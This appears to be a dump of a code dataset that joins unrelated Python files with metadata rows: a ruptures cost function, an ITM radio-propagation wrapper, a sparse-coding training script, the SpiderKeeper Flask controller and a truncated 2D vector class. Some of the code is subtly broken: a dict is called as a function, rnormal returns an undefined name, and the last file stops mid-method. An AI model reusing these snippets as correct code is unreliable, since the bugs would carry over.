| apache-2.0 | -6,789,120,600,701,348,000 | 23.027778 | 67 | 0.645665 | false | 3.295238 | false | false | false |
deepcharles/ruptures | src/ruptures/costs/costml.py | 1 | 1843 | r"""Change detection with a Mahalanobis-type metric"""
import numpy as np
from numpy.linalg import inv
from ruptures.base import BaseCost
from ruptures.exceptions import NotEnoughPoints
class CostMl(BaseCost):
r"""Mahalanobis-type cost function."""
model = "mahalanobis"
def __init__(self, metric=None):
"""Create a new instance.
Args:
metric (ndarray, optional): PSD matrix that defines a Mahalanobis-type pseudo distance. If None, defaults to the Mahalanobis matrix. Shape (n_features, n_features).
"""
self.metric = metric
self.gram = None
self.min_size = 2
def fit(self, signal) -> "CostMl":
"""Set parameters of the instance.
Args:
signal (array): signal. Shape (n_samples,) or (n_samples, n_features)
Returns:
self
"""
s_ = signal.reshape(-1, 1) if signal.ndim == 1 else signal
# Mahalanobis metric if self.metric is None
if self.metric is None:
covar = np.cov(s_.T)
self.metric = inv(covar.reshape(1, 1) if covar.size == 1 else covar)
self.gram = s_.dot(self.metric).dot(s_.T)
self.signal = s_
return self
def error(self, start, end):
"""Return the approximation cost on the segment [start:end].
Args:
start (int): start of the segment
end (int): end of the segment
Returns:
float: segment cost
Raises:
NotEnoughPoints: when the segment is too short (less than ``'min_size'`` samples).
"""
if end - start < self.min_size:
raise NotEnoughPoints
sub_gram = self.gram[start:end, start:end]
val = np.diagonal(sub_gram).sum()
val -= sub_gram.sum() / (end - start)
return val
| bsd-2-clause | -1,146,421,115,365,335,800 | 27.353846 | 176 | 0.582203 | false | 3.768916 | false | false | false |
Wireless-Innovation-Forum/Spectrum-Access-System | src/harness/reference_models/propagation/wf_itm.py | 1 | 9864 | # Copyright 2017 SAS Project Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""WinnForum-specific version of ITM propagation model.
Typical usage:
# Configure the terrain driver (memory use is: cache_size * 50MB)
from reference_models.geo import drive
drive.ConfigureTerrainDriver(terrain_dir=my_ned_path, cache_size=16)
# Get the path loss and incidence angles
db_loss, incidence_angles, internals = CalcItmPropagationLoss(
lat_cbsd, lon_cbsd, height_cbsd,
lat_rx, lon_rx, height_rx,
cbsd_indoor=False,
reliability=0.5,
freq_mhz=3625.)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import namedtuple
import numpy as np
from reference_models.geo import drive
from reference_models.geo import vincenty
from reference_models.propagation.itm import itm
# TEMPORARY to avoid breaking code under PR
terrainDriver = drive.terrain_driver
# ITM warning codes
class ItmErrorCode:
NONE = 0
CAUTION = 1
NOTE = 2
WARNING = 3
OTHER = 4
_ITM_ERROR_MODES = {
ItmErrorCode.NONE: 'No Error.',
ItmErrorCode.CAUTION: ('Caution: Some parameters are nearly out of range.'
' Results should be used with caution.'),
ItmErrorCode.NOTE: ('Note: Default parameters have been substituted for impossible ones.'),
ItmErrorCode.WARNING: ('Warning: A combination of parameters is out of range.'
' Results are probably invalid.'),
ItmErrorCode.OTHER: ('Warning: Some parameters are out of range.'
' Results are probably invalid.')
}
def GetInfoOnItmCode(code):
"""Get description of ITM error code."""
return _ITM_ERROR_MODES(code)
# Defined namedtuple for nice output packing
_PropagResult = namedtuple('_PropagResult',
['db_loss', 'incidence_angles', 'internals'])
_IncidenceAngles = namedtuple('_IncidenceAngles',
['hor_cbsd', 'ver_cbsd', 'hor_rx', 'ver_rx'])
# Main entry point for the Winnforum compliant ITM propagation model
def CalcItmPropagationLoss(lat_cbsd, lon_cbsd, height_cbsd,
lat_rx, lon_rx, height_rx,
cbsd_indoor=False,
reliability=0.5,
freq_mhz=3625.,
its_elev=None,
is_height_cbsd_amsl=False,
return_internals=False):
"""Implements the WinnForum-compliant ITM point-to-point propagation model.
According to WinnForum spec R2-SGN-17, R2-SGN-22 and R2-SGN-5 to 10.
One can use this routine in 3 ways:
reliability = -1 : to get the average path loss
reliability in [0,1] : to get a pathloss for given quantile
sequence of reliabilities: to get an array of pathloss. Used to obtain
inverse CDF of the pathloss.
Inputs:
lat_cbsd, lon_cbsd, height_cbsd: Lat/lon (deg) and height AGL (m) of CBSD
lat_rx, lon_rx, height_rx: Lat/lon (deg) and height AGL (m) of Rx point
cbsd_indoor: CBSD indoor status - Default=False.
reliability: Reliability. Default is 0.5 (median value)
Different options:
value in [0,1]: returns the CDF quantile
-1: returns the mean path loss
iterable sequence: returns a list of path losses
freq_mhz: Frequency (MHz). Default is mid-point of band.
its_elev: Optional profile to use (in ITM format). Default=None
If not specified, it is extracted from the terrain.
is_height_cbsd_amsl: If True, the CBSD height shall be considered as AMSL (Average
mean sea level).
return_internals: If True, returns internal variables.
Returns:
A namedtuple of:
db_loss Path Loss in dB, either a scalar if reliability is scalar
or a list of path losses if reliability is an iterable.
incidence_angles: A namedtuple of
hor_cbsd: Horizontal departure angle (bearing) from CBSD to Rx
ver_cbsd: Vertical departure angle at CBSD
hor_rx: Horizontal incidence angle (bearing) from Rx to CBSD
ver_rx: Vertical incidence angle at Rx
internals: A dictionary of internal data for advanced analysis
(only if return_internals=True):
itm_err_num: ITM error code from ItmErrorCode (see GetInfoOnItmCode).
itm_str_mode: String containing description of dominant prop mode.
dist_km: Distance between end points (km).
prof_d_km ndarray of distances (km) - x values to plot terrain.
prof_elev ndarray of terrain heightsheights (m) - y values to plot terrain,
Raises:
Exception if input parameters invalid or out of range.
"""
# Case of same points
if (lat_cbsd == lat_rx and lon_cbsd == lon_rx):
return _PropagResult(
db_loss = 0 if np.isscalar(reliability) else [0] * len(reliability),
incidence_angles = _IncidenceAngles(0,0,0,0),
internals = None)
# Sanity checks on input parameters
if freq_mhz < 40.0 or freq_mhz > 10000:
raise Exception('Frequency outside range [40MHz - 10GHz]')
if is_height_cbsd_amsl:
altitude_cbsd = drive.terrain_driver.GetTerrainElevation(lat_cbsd, lon_cbsd)
height_cbsd = height_cbsd - altitude_cbsd
# Ensure minimum height of 1 meter
if height_cbsd < 1:
height_cbsd = 1
if height_rx < 1:
height_rx = 1
# Internal ITM parameters are always set to following values in WF version:
confidence = 0.5 # Confidence (always 0.5)
dielec = 25. # Dielectric constant (always 25.)
conductivity = 0.02 # Conductivity (always 0.02)
polarization = 1 # Polarization (always vertical = 1)
mdvar = 13
# Get the terrain profile, using Vincenty great circle route, and WF
# standard (bilinear interp; 1500 pts for all distances over 45 km)
if its_elev is None:
its_elev = drive.terrain_driver.TerrainProfile(
lat1=lat_cbsd, lon1=lon_cbsd,
lat2=lat_rx, lon2=lon_rx,
target_res_meter=30.,
do_interp=True, max_points=1501)
# Find the midpoint of the great circle path
dist_km, bearing_cbsd, bearing_rx = vincenty.GeodesicDistanceBearing(
lat_cbsd, lon_cbsd, lat_rx, lon_rx)
latmid, lonmid, _ = vincenty.GeodesicPoint(
lat_cbsd, lon_cbsd, dist_km/2., bearing_cbsd)
# Determine climate value, based on ITU-R P.617 method:
climate = drive.climate_driver.TropoClim(latmid, lonmid)
# If the common volume lies over the sea, the climate value to use depends
# on the climate values at either end. A simple min() function should
# properly implement the logic, since water is the max.
if climate == 7:
climate = min(drive.climate_driver.TropoClim(lat_cbsd, lon_cbsd),
drive.climate_driver.TropoClim(lat_rx, lon_rx))
# Look up the refractivity at the path midpoint, if not explicitly provided
refractivity = drive.refract_driver.Refractivity(latmid, lonmid)
# Call ITM prop loss.
reliabilities = reliability
do_avg = False
if np.isscalar(reliabilities) and reliability == -1:
# Pathloss mean: average the value for 1% to 99% included
reliabilities = np.arange(0.01, 1.0, 0.01)
do_avg = True
db_loss, ver_cbsd, ver_rx, str_mode, err_num = itm.point_to_point(
its_elev, height_cbsd, height_rx,
dielec, conductivity,
refractivity, freq_mhz,
climate, polarization,
confidence, reliabilities,
mdvar, False)
if do_avg:
db_loss = -10*np.log10(np.mean(10**(-np.array(db_loss)/10.)))
# Add indoor losses
if cbsd_indoor:
if np.isscalar(db_loss):
db_loss += 15
else:
db_loss = [loss+15 for loss in db_loss]
# Create distance/terrain arrays for plotting if desired
internals = None
if return_internals:
prof_d_km = (its_elev[1]/1000.) * np.arange(len(its_elev)-2)
prof_elev = np.asarray(its_elev[2:])
internals = {
'itm_err_num': err_num,
'itm_str_mode': str_mode,
'dist_km': dist_km,
'prof_d_km': prof_d_km,
'prof_elev': prof_elev
}
return _PropagResult(
db_loss = db_loss,
incidence_angles = _IncidenceAngles(
hor_cbsd = bearing_cbsd,
ver_cbsd = ver_cbsd,
hor_rx = bearing_rx,
ver_rx = ver_rx),
internals = internals
)
# Utility function to compute the HAAT for a CBSD
def ComputeHaat(lat_cbsd, lon_cbsd, height_cbsd, height_is_agl=True):
"""Computes a CBSD HAAT (Height above average terrain).
Args:
lat_cbsd, lon_cbsd: the CBSD location (degrees).
height_cbsd: the CBSD antenna height (meters)
height_is_agl: boolean specifying if height is AGL (Above Ground Level)
or AMSL (Above Mean Sea Level).
Returns:
the CBSD HAAT (meters).
"""
norm_haat, alt_ground = drive.terrain_driver.ComputeNormalizedHaat(lat_cbsd, lon_cbsd)
if height_is_agl:
return height_cbsd + norm_haat
else:
return height_cbsd - alt_ground + norm_haat
| apache-2.0 | 3,250,323,010,851,435,000 | 37.834646 | 95 | 0.643654 | false | 3.486744 | false | false | false |
emdodds/DictLearner | scripts/tsn_script.py | 1 | 2336 | # -*- coding: utf-8 -*-
"""
Created on Thu Jul 28 12:11:07 2016
@author: Eric
"""
import argparse
import pickle
import TopoSparsenet
import numpy as np
import scipy.io as io
parser = argparse.ArgumentParser(description="Learn dictionaries for Topographic Sparsenet with given parameters.")
parser.add_argument('-d', '--data', default='images', type=str)
parser.add_argument('-r', '--resultsfolder', default='',type=str)
parser.add_argument('-s', '--suffix', default='ptwise', type=str)
parser.add_argument('-i', '--niter', default=200, type=int)
parser.add_argument('-l', '--lam', default=0.15, type=float)
parser.add_argument('-l2', '--lam2', default=0.05, type=float)
#parser.add_argument('--shape', default = (25,32), type=tuple)
parser.add_argument('--sigma', default = 1, type=float)
parser.add_argument('--binarize', action='store_true')
args=parser.parse_args()
data = args.data
resultsfolder = args.resultsfolder
shape = (25,32)#args.shape
suffix = args.suffix
niter = args.niter
lam = args.lam
lam2 = args.lam2
sigma = args.sigma
binarize = args.binarize
if data == 'images':
datafile = '../vision/Data/IMAGES.mat'
numinput = 256
data = io.loadmat(datafile)["IMAGES"]
if resultsfolder == '':
resultsfolder = '../vision/Results/'
net = TopoSparsenet.TopoSparsenet(data, shape, paramfile='dummy')
net.gain_rate = 0.001
elif data == 'spectros':
datafile = '../audition/Data/speech_ptwisecut'
numinput = 200
with open(datafile+'_pca.pickle', 'rb') as f:
mypca, origshape = pickle.load(f)
data = np.load(datafile+'.npy')
data = data/data.std()
if resultsfolder == '':
resultsfolder = '../audition/Results/'
net = TopoSparsenet.TopoSparsenet(data=data, dict_shape=shape,
learnrate = 0.0005, datatype='spectro', pca=mypca,
stimshape=origshape,
sigma=sigma,
gain_rate=0.001, var_goal=0.033)
net.niter = niter
net.lamb = lam
net.lamb_2 = lam2
net.learnrate = 0.0005
if binarize:
net.binarize_g()
savestr = resultsfolder+'TSN'+str(shape[0])+'x'+str(shape[1]) + 's'+str(sigma)+ suffix
net.save(savestr+'.pickle')
net.run(ntrials=10000)
net.save()
| mit | 878,909,952,578,454,500 | 30.444444 | 115 | 0.623716 | false | 3.131367 | false | false | false |
DormyMo/SpiderKeeper | SpiderKeeper/app/spider/controller.py | 1 | 23859 | import datetime
import os
import tempfile
import flask_restful
import requests
from flask import Blueprint, request
from flask import abort
from flask import flash
from flask import redirect
from flask import render_template
from flask import session
from flask_restful_swagger import swagger
from werkzeug.utils import secure_filename
from SpiderKeeper.app import db, api, agent, app
from SpiderKeeper.app.spider.model import JobInstance, Project, JobExecution, SpiderInstance, JobRunType
api_spider_bp = Blueprint('spider', __name__)
'''
========= api =========
'''
class ProjectCtrl(flask_restful.Resource):
@swagger.operation(
summary='list projects',
parameters=[])
def get(self):
return [project.to_dict() for project in Project.query.all()]
@swagger.operation(
summary='add project',
parameters=[{
"name": "project_name",
"description": "project name",
"required": True,
"paramType": "form",
"dataType": 'string'
}])
def post(self):
project_name = request.form['project_name']
project = Project()
project.project_name = project_name
db.session.add(project)
db.session.commit()
return project.to_dict()
class SpiderCtrl(flask_restful.Resource):
@swagger.operation(
summary='list spiders',
parameters=[{
"name": "project_id",
"description": "project id",
"required": True,
"paramType": "path",
"dataType": 'int'
}])
def get(self, project_id):
project = Project.find_project_by_id(project_id)
return [spider_instance.to_dict() for spider_instance in
SpiderInstance.query.filter_by(project_id=project_id).all()]
class SpiderDetailCtrl(flask_restful.Resource):
@swagger.operation(
summary='spider detail',
parameters=[{
"name": "project_id",
"description": "project id",
"required": True,
"paramType": "path",
"dataType": 'int'
}, {
"name": "spider_id",
"description": "spider instance id",
"required": True,
"paramType": "path",
"dataType": 'int'
}])
def get(self, project_id, spider_id):
spider_instance = SpiderInstance.query.filter_by(project_id=project_id, id=spider_id).first()
return spider_instance.to_dict() if spider_instance else abort(404)
@swagger.operation(
summary='run spider',
parameters=[{
"name": "project_id",
"description": "project id",
"required": True,
"paramType": "path",
"dataType": 'int'
}, {
"name": "spider_id",
"description": "spider instance id",
"required": True,
"paramType": "path",
"dataType": 'int'
}, {
"name": "spider_arguments",
"description": "spider arguments",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "priority",
"description": "LOW: -1, NORMAL: 0, HIGH: 1, HIGHEST: 2",
"required": False,
"paramType": "form",
"dataType": 'int'
}, {
"name": "tags",
"description": "spider tags",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "desc",
"description": "spider desc",
"required": False,
"paramType": "form",
"dataType": 'string'
}])
def put(self, project_id, spider_id):
spider_instance = SpiderInstance.query.filter_by(project_id=project_id, id=spider_id).first()
if not spider_instance: abort(404)
job_instance = JobInstance()
job_instance.spider_name = spider_instance.spider_name
job_instance.project_id = project_id
job_instance.spider_arguments = request.form.get('spider_arguments')
job_instance.desc = request.form.get('desc')
job_instance.tags = request.form.get('tags')
job_instance.run_type = JobRunType.ONETIME
job_instance.priority = request.form.get('priority', 0)
job_instance.enabled = -1
db.session.add(job_instance)
db.session.commit()
agent.start_spider(job_instance)
return True
JOB_INSTANCE_FIELDS = [column.name for column in JobInstance.__table__.columns]
JOB_INSTANCE_FIELDS.remove('id')
JOB_INSTANCE_FIELDS.remove('date_created')
JOB_INSTANCE_FIELDS.remove('date_modified')
class JobCtrl(flask_restful.Resource):
@swagger.operation(
summary='list job instance',
parameters=[{
"name": "project_id",
"description": "project id",
"required": True,
"paramType": "path",
"dataType": 'int'
}])
def get(self, project_id):
return [job_instance.to_dict() for job_instance in
JobInstance.query.filter_by(run_type="periodic", project_id=project_id).all()]
@swagger.operation(
summary='add job instance',
notes="json keys: <br>" + "<br>".join(JOB_INSTANCE_FIELDS),
parameters=[{
"name": "project_id",
"description": "project id",
"required": True,
"paramType": "path",
"dataType": 'int'
}, {
"name": "spider_name",
"description": "spider_name",
"required": True,
"paramType": "form",
"dataType": 'string'
}, {
"name": "spider_arguments",
"description": "spider_arguments, split by ','",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "desc",
"description": "desc",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "tags",
"description": "tags , split by ','",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "run_type",
"description": "onetime/periodic",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "priority",
"description": "LOW: -1, NORMAL: 0, HIGH: 1, HIGHEST: 2",
"required": False,
"paramType": "form",
"dataType": 'int'
}, {
"name": "cron_minutes",
"description": "@see http://apscheduler.readthedocs.io/en/latest/modules/triggers/cron.html",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "cron_hour",
"description": "",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "cron_day_of_month",
"description": "",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "cron_day_of_week",
"description": "",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "cron_month",
"description": "",
"required": False,
"paramType": "form",
"dataType": 'string'
}])
def post(self, project_id):
post_data = request.form
if post_data:
job_instance = JobInstance()
job_instance.spider_name = post_data['spider_name']
job_instance.project_id = project_id
job_instance.spider_arguments = post_data.get('spider_arguments')
job_instance.desc = post_data.get('desc')
job_instance.tags = post_data.get('tags')
job_instance.run_type = post_data['run_type']
job_instance.priority = post_data.get('priority', 0)
if job_instance.run_type == "periodic":
job_instance.cron_minutes = post_data.get('cron_minutes') or '0'
job_instance.cron_hour = post_data.get('cron_hour') or '*'
job_instance.cron_day_of_month = post_data.get('cron_day_of_month') or '*'
job_instance.cron_day_of_week = post_data.get('cron_day_of_week') or '*'
job_instance.cron_month = post_data.get('cron_month') or '*'
db.session.add(job_instance)
db.session.commit()
return True
class JobDetailCtrl(flask_restful.Resource):
@swagger.operation(
summary='update job instance',
notes="json keys: <br>" + "<br>".join(JOB_INSTANCE_FIELDS),
parameters=[{
"name": "project_id",
"description": "project id",
"required": True,
"paramType": "path",
"dataType": 'int'
}, {
"name": "job_id",
"description": "job instance id",
"required": True,
"paramType": "path",
"dataType": 'int'
}, {
"name": "spider_name",
"description": "spider_name",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "spider_arguments",
"description": "spider_arguments, split by ','",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "desc",
"description": "desc",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "tags",
"description": "tags , split by ','",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "run_type",
"description": "onetime/periodic",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "priority",
"description": "LOW: -1, NORMAL: 0, HIGH: 1, HIGHEST: 2",
"required": False,
"paramType": "form",
"dataType": 'int'
}, {
"name": "cron_minutes",
"description": "@see http://apscheduler.readthedocs.io/en/latest/modules/triggers/cron.html",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "cron_hour",
"description": "",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "cron_day_of_month",
"description": "",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "cron_day_of_week",
"description": "",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "cron_month",
"description": "",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "enabled",
"description": "-1 / 0, default: 0",
"required": False,
"paramType": "form",
"dataType": 'int'
}, {
"name": "status",
"description": "if set to 'run' will run the job",
"required": False,
"paramType": "form",
"dataType": 'int'
}
])
def put(self, project_id, job_id):
post_data = request.form
if post_data:
job_instance = JobInstance.query.filter_by(project_id=project_id, id=job_id).first()
if not job_instance: abort(404)
job_instance.spider_arguments = post_data.get('spider_arguments') or job_instance.spider_arguments
job_instance.priority = post_data.get('priority') or job_instance.priority
job_instance.enabled = post_data.get('enabled', 0)
job_instance.cron_minutes = post_data.get('cron_minutes') or job_instance.cron_minutes
job_instance.cron_hour = post_data.get('cron_hour') or job_instance.cron_hour
job_instance.cron_day_of_month = post_data.get('cron_day_of_month') or job_instance.cron_day_of_month
job_instance.cron_day_of_week = post_data.get('cron_day_of_week') or job_instance.cron_day_of_week
job_instance.cron_month = post_data.get('cron_month') or job_instance.cron_month
job_instance.desc = post_data.get('desc', 0) or job_instance.desc
job_instance.tags = post_data.get('tags', 0) or job_instance.tags
db.session.commit()
if post_data.get('status') == 'run':
agent.start_spider(job_instance)
return True
class JobExecutionCtrl(flask_restful.Resource):
@swagger.operation(
summary='list job execution status',
parameters=[{
"name": "project_id",
"description": "project id",
"required": True,
"paramType": "path",
"dataType": 'int'
}])
def get(self, project_id):
return JobExecution.list_jobs(project_id)
class JobExecutionDetailCtrl(flask_restful.Resource):
@swagger.operation(
summary='stop job',
notes='',
parameters=[
{
"name": "project_id",
"description": "project id",
"required": True,
"paramType": "path",
"dataType": 'int'
},
{
"name": "job_exec_id",
"description": "job_execution_id",
"required": True,
"paramType": "path",
"dataType": 'string'
}
])
def put(self, project_id, job_exec_id):
job_execution = JobExecution.query.filter_by(project_id=project_id, id=job_exec_id).first()
if job_execution:
agent.cancel_spider(job_execution)
return True
api.add_resource(ProjectCtrl, "/api/projects")
api.add_resource(SpiderCtrl, "/api/projects/<project_id>/spiders")
api.add_resource(SpiderDetailCtrl, "/api/projects/<project_id>/spiders/<spider_id>")
api.add_resource(JobCtrl, "/api/projects/<project_id>/jobs")
api.add_resource(JobDetailCtrl, "/api/projects/<project_id>/jobs/<job_id>")
api.add_resource(JobExecutionCtrl, "/api/projects/<project_id>/jobexecs")
api.add_resource(JobExecutionDetailCtrl, "/api/projects/<project_id>/jobexecs/<job_exec_id>")
'''
========= Router =========
'''
@app.before_request
def intercept_no_project():
if request.path.find('/project//') > -1:
flash("create project first")
return redirect("/project/manage", code=302)
@app.context_processor
def inject_common():
return dict(now=datetime.datetime.now(),
servers=agent.servers)
@app.context_processor
def inject_project():
project_context = {}
project_context['project_list'] = Project.query.all()
if project_context['project_list'] and (not session.get('project_id')):
project = Project.query.first()
session['project_id'] = project.id
if session.get('project_id'):
project_context['project'] = Project.find_project_by_id(session['project_id'])
project_context['spider_list'] = [spider_instance.to_dict() for spider_instance in
SpiderInstance.query.filter_by(project_id=session['project_id']).all()]
else:
project_context['project'] = {}
return project_context
@app.context_processor
def utility_processor():
def timedelta(end_time, start_time):
'''
:param end_time:
:param start_time:
:param unit: s m h
:return:
'''
if not end_time or not start_time:
return ''
if type(end_time) == str:
end_time = datetime.datetime.strptime(end_time, '%Y-%m-%d %H:%M:%S')
if type(start_time) == str:
start_time = datetime.datetime.strptime(start_time, '%Y-%m-%d %H:%M:%S')
total_seconds = (end_time - start_time).total_seconds()
return readable_time(total_seconds)
def readable_time(total_seconds):
if not total_seconds:
return '-'
if total_seconds < 60:
return '%s s' % total_seconds
if total_seconds < 3600:
return '%s m' % int(total_seconds / 60)
return '%s h %s m' % (int(total_seconds / 3600), int((total_seconds % 3600) / 60))
return dict(timedelta=timedelta, readable_time=readable_time)
@app.route("/")
def index():
project = Project.query.first()
if project:
return redirect("/project/%s/job/dashboard" % project.id, code=302)
return redirect("/project/manage", code=302)
@app.route("/project/<project_id>")
def project_index(project_id):
session['project_id'] = project_id
return redirect("/project/%s/job/dashboard" % project_id, code=302)
@app.route("/project/create", methods=['post'])
def project_create():
project_name = request.form['project_name']
project = Project()
project.project_name = project_name
db.session.add(project)
db.session.commit()
return redirect("/project/%s/spider/deploy" % project.id, code=302)
@app.route("/project/<project_id>/delete")
def project_delete(project_id):
project = Project.find_project_by_id(project_id)
agent.delete_project(project)
db.session.delete(project)
db.session.commit()
return redirect("/project/manage", code=302)
@app.route("/project/manage")
def project_manage():
return render_template("project_manage.html")
@app.route("/project/<project_id>/job/dashboard")
def job_dashboard(project_id):
return render_template("job_dashboard.html", job_status=JobExecution.list_jobs(project_id))
@app.route("/project/<project_id>/job/periodic")
def job_periodic(project_id):
project = Project.find_project_by_id(project_id)
job_instance_list = [job_instance.to_dict() for job_instance in
JobInstance.query.filter_by(run_type="periodic", project_id=project_id).all()]
return render_template("job_periodic.html",
job_instance_list=job_instance_list)
@app.route("/project/<project_id>/job/add", methods=['post'])
def job_add(project_id):
project = Project.find_project_by_id(project_id)
job_instance = JobInstance()
job_instance.spider_name = request.form['spider_name']
job_instance.project_id = project_id
job_instance.spider_arguments = request.form['spider_arguments']
job_instance.priority = request.form.get('priority', 0)
job_instance.run_type = request.form['run_type']
# chose daemon manually
if request.form['daemon'] != 'auto':
spider_args = []
if request.form['spider_arguments']:
spider_args = request.form['spider_arguments'].split(",")
spider_args.append("daemon={}".format(request.form['daemon']))
job_instance.spider_arguments = ','.join(spider_args)
if job_instance.run_type == JobRunType.ONETIME:
job_instance.enabled = -1
db.session.add(job_instance)
db.session.commit()
agent.start_spider(job_instance)
if job_instance.run_type == JobRunType.PERIODIC:
job_instance.cron_minutes = request.form.get('cron_minutes') or '0'
job_instance.cron_hour = request.form.get('cron_hour') or '*'
job_instance.cron_day_of_month = request.form.get('cron_day_of_month') or '*'
job_instance.cron_day_of_week = request.form.get('cron_day_of_week') or '*'
job_instance.cron_month = request.form.get('cron_month') or '*'
# set cron exp manually
if request.form.get('cron_exp'):
job_instance.cron_minutes, job_instance.cron_hour, job_instance.cron_day_of_month, job_instance.cron_day_of_week, job_instance.cron_month = \
request.form['cron_exp'].split(' ')
db.session.add(job_instance)
db.session.commit()
return redirect(request.referrer, code=302)
@app.route("/project/<project_id>/jobexecs/<job_exec_id>/stop")
def job_stop(project_id, job_exec_id):
job_execution = JobExecution.query.filter_by(project_id=project_id, id=job_exec_id).first()
agent.cancel_spider(job_execution)
return redirect(request.referrer, code=302)
@app.route("/project/<project_id>/jobexecs/<job_exec_id>/log")
def job_log(project_id, job_exec_id):
job_execution = JobExecution.query.filter_by(project_id=project_id, id=job_exec_id).first()
res = requests.get(agent.log_url(job_execution))
res.encoding = 'utf8'
raw = res.text
return render_template("job_log.html", log_lines=raw.split('\n'))
@app.route("/project/<project_id>/job/<job_instance_id>/run")
def job_run(project_id, job_instance_id):
job_instance = JobInstance.query.filter_by(project_id=project_id, id=job_instance_id).first()
agent.start_spider(job_instance)
return redirect(request.referrer, code=302)
@app.route("/project/<project_id>/job/<job_instance_id>/remove")
def job_remove(project_id, job_instance_id):
job_instance = JobInstance.query.filter_by(project_id=project_id, id=job_instance_id).first()
db.session.delete(job_instance)
db.session.commit()
return redirect(request.referrer, code=302)
@app.route("/project/<project_id>/job/<job_instance_id>/switch")
def job_switch(project_id, job_instance_id):
job_instance = JobInstance.query.filter_by(project_id=project_id, id=job_instance_id).first()
job_instance.enabled = -1 if job_instance.enabled == 0 else 0
db.session.commit()
return redirect(request.referrer, code=302)
@app.route("/project/<project_id>/spider/dashboard")
def spider_dashboard(project_id):
spider_instance_list = SpiderInstance.list_spiders(project_id)
return render_template("spider_dashboard.html",
spider_instance_list=spider_instance_list)
@app.route("/project/<project_id>/spider/deploy")
def spider_deploy(project_id):
project = Project.find_project_by_id(project_id)
return render_template("spider_deploy.html")
@app.route("/project/<project_id>/spider/upload", methods=['post'])
def spider_egg_upload(project_id):
project = Project.find_project_by_id(project_id)
if 'file' not in request.files:
flash('No file part')
return redirect(request.referrer)
file = request.files['file']
# if user does not select file, browser also
# submit a empty part without filename
if file.filename == '':
flash('No selected file')
return redirect(request.referrer)
if file:
filename = secure_filename(file.filename)
dst = os.path.join(tempfile.gettempdir(), filename)
file.save(dst)
agent.deploy(project, dst)
flash('deploy success!')
return redirect(request.referrer)
@app.route("/project/<project_id>/project/stats")
def project_stats(project_id):
project = Project.find_project_by_id(project_id)
run_stats = JobExecution.list_run_stats_by_hours(project_id)
return render_template("project_stats.html", run_stats=run_stats)
@app.route("/project/<project_id>/server/stats")
def service_stats(project_id):
project = Project.find_project_by_id(project_id)
run_stats = JobExecution.list_run_stats_by_hours(project_id)
return render_template("server_stats.html", run_stats=run_stats)
| mit | -8,691,276,491,781,630,000 | 34.824324 | 153 | 0.568171 | false | 3.770982 | false | false | false |
FCDM/py-dml | dml/maths/geometry.py | 1 | 3226 | import math
class Vector2D(object):
"""
A vector in 2-dimensional space.
"""
def __init__(self, x, y=None):
if y is None:
x, y = x
self.x = x
self.y = y
@classmethod
def fromAngle(cls, angle, radians=True):
"""Return the unit vector in the given direction."""
if not radians:
angle = math.radians(angle)
return cls(math.cos(angle), math.sin(angle))
def __repr__(self):
return "Vector2D(%g, %g)" % (self.x, self.y)
def __hash__(self):
return hash((self.x, self.y))
def __getitem__(self, key):
if key == 0:
return self.x
return self.y
def __iter__(self):
return iter((self.x, self.y))
def __pos__(self):
return Vector2D(self.x, self.y)
def __neg__(self):
return Vector2D(-self.x, -self.y)
def __add__(self, other):
return Vector2D(self.x + other.x, self.y + other.y)
__radd__ = __add__
def __sub__(self, other):
return Vector2D(self.x - other.x, self.y - other.y)
def __rsub__(self, other):
return Vector2D(other.x - self.x, other.y - self.y)
def __mul__(self, other):
return Vector2D(self.x*other, self.y*other)
__rmul__ = __mul__
def __div__(self, other):
return Vector2D(self.x/other, self.y/other)
__truediv__ = __div__
def floor(self):
"""Floor the components of this vector."""
return Vector2D(int(self.x), int(self.y))
def magnitude(self):
"""Calculate the magnitude of this vector."""
return math.sqrt(self.x*self.x + self.y*self.y)
def magnitudeSquared(self):
"""Calculate the squared magnitude of this vector."""
return self.dot(self)
def dot(self, other):
"""Calculate the dot product of this vector and another."""
return self.x*other.x + self.y*other.y
def normalize(self):
"""Return the normalization of this vector."""
return self/self.magnitude()
def lnormal(self):
"""Return the left normal of this vector."""
return Vector2D(self.y, -self.x)
def rnormal(self):
"""Return the right normal of this vector."""
return vector2D(-self.y, self.x)
def projectOnto(self, other):
"""Return the projection of this vector onto another."""
scalar = self.dot(other)/other.magnitudeSquared()
return other*scalar
def rotateRelative(self, angle, origin, radians=True):
"""Rotate this vector relative to another by the given amount."""
if not radians:
angle = math.radians(angle)
x, y = self
x -= origin.x
y -= origin.y
cos_theta = math.cos(angle)
sin_theta = math.sin(angle)
nx = x*cos_theta - y*sin_theta
ny = x*sin_theta + y*cos_theta
return Vector2D(nx + origin.x, ny + origin.y)
def rotate(self, angle, radians=True):
"""Rotate this vector by the given amount."""
if not radians:
angle = math.radians(angle)
x, y = self
cos_theta = math.cos(angle)
sin_theta = math.sin(angle)
